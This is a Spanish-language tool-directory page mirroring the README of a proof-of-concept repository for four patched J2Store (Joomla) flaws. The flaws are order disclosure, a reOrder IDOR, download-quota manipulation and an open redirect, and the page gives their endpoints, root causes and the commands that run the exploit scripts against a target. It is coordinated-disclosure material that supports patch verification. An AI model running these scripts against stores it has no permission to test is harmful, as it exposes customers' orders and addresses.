Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-J2store-2026 — PoC para J2Store CVE-2026-67358–67362 (Aviso de seguridad de J2Commerce de agosto de 2026) | Kitploit
Herramientas/GitHubGitHub/murrez/cve-j2store-2026
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmurrez/cve-j2store-2026

CVE-J2store-2026

PoC para J2Store CVE-2026-67358–67362 (Aviso de seguridad de J2Commerce de agosto de 2026)

Ver Repositorio
hace 2 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

J2Store / J2Commerce — CVE-2026-67358–67362 PoC

Material de prueba de concepto para cuatro vulnerabilidades en com_j2store (J2Commerce J2Store), descubiertas por Murrez y corregidas en:

RamaVersión corregida
Descargar herramienta
J2Store 3.x
3.3.21
J2Store 4.0.x4.0.21
J2Store 4.1.x4.1.6

Aviso oficial: Anuncio de seguridad de J2Commerce (2026-08-20)


Resumen

CVEProblemaAutenticaciónCVSS 4.0Gravedad
CVE-2026-67359Partidas y totales del pedido sin autenticación mediante expressconfirmNinguna8.7Alta
CVE-2026-67360IDOR reOrder entre clientes (carrito/dirección de la víctima en la sesión del atacante)Baja (usuario autenticado)8.7Alta
CVE-2026-67358updateHitCount consume la cuota de descarga de otro clienteBaja (token de pedido de invitado)5.3Media
CVE-2026-67362Redirección abierta en tareas del carrito (setcurrency, addItem, applyCoupon, applyVoucher)Ninguna5.1Media

Versión probada: J2Store Pro 4.1.5 en Joomla 5.x (laboratorio local).


Descargo de responsabilidad

Solo para investigación de seguridad autorizada y verificación de parches. No lo utilice contra sistemas que no posea o para los que no tenga permiso explícito de prueba.


Requisitos

root@kitploit:~
pip install -r requirements.txt

Python 3.10+


Inicio rápido

URL base del laboratorio por defecto: http://127.0.0.1:9991

root@kitploit:~
# CVE-2026-67359 — unauth order disclosure
python poc/CVE-2026-67359_expressconfirm.py --base http://TARGET --order-id ORDER_ID

# CVE-2026-67362 — open redirect (checks Location header)
python poc/CVE-2026-67362_open_redirect.py --base http://TARGET

# CVE-2026-67358 — cross-order download quota burn
python poc/CVE-2026-67358_updateHitCount.py \
  --base http://TARGET \
  --order-id YOUR_ORDER_ID \
  --token YOUR_ORDER_TOKEN \
  --victim-orderdownload-id 2

# CVE-2026-67360 — reOrder IDOR (requires Joomla login + CSRF)
python poc/CVE-2026-67360_reOrder.py \
  --base http://TARGET \
  --order-id VICTIM_ORDER_ID \
  --username USER --password PASS

# Run all applicable unauthenticated checks
python poc/run_all.py --base http://TARGET --order-id ORDER_ID

Reproducciones mínimas Burp/curl: replay/


Detalles de las vulnerabilidades

CVE-2026-67359 — Divulgación de pedidos mediante expressconfirm

Endpoint: GET /index.php?option=com_j2store&view=checkout&task=expressconfirm&order_id=…

Cuando no existe una sesión de pago activa, cualquier order_id muestra la página de confirmación de pago exprés (partidas, cantidades, precios, totales) sin autenticación.

Causa raíz: components/com_j2store/controllers/checkouts.php — expressconfirm() utiliza el order_id proporcionado en la solicitud sin comprobar su propiedad.


CVE-2026-67360 — IDOR reOrder

Endpoint: GET /index.php?option=com_j2store&view=myprofile&task=reOrder&order_id=…&{csrf}=1

Un usuario autenticado que tenga el order_id de una víctima puede ejecutar reOrder: los elementos de línea de la víctima se copian al carrito del atacante; los IDs de las direcciones de facturación y envío de la víctima se almacenan en la sesión del atacante.

Causa raíz: components/com_j2store/controllers/myprofile.php — reOrder() valida CSRF e inicio de sesión pero no $order->user_id.


CVE-2026-67358 — Manipulación de cuota en updateHitCount

Endpoint: POST /index.php?option=com_j2store&view=myprofile&task=updateHitCount

Un invitado o cliente con un par (order_id, token) válido propio puede incrementar limit_count sobre el orderdownload_id de otro pedido. No se requiere token CSRF.

Causa raíz: components/com_j2store/controllers/myprofile.php — el token solo se comprueba contra el pedido del solicitante; orderdownload_id no está vinculado a ese pedido.


CVE-2026-67362 — Redirección abierta

Tareas: carts.setcurrency, carts.addItem, carts.applyCoupon, carts.applyVoucher

Los parámetros redirect / return codificados en Base64 se decodifican y se pasan a $app->redirect() sin lista blanca de hosts. JRoute::_() no bloquea URLs externas absolutas.

Causa raíz: components/com_j2store/controllers/carts.php


Créditos

Los problemas 1, 2, 3 y 5 del aviso del proveedor — Murrez ([email protected]).

Divulgación coordinada a través de J2Commerce y el Joomla Security Strike Team.


Licencia

MIT — consulte LICENSE.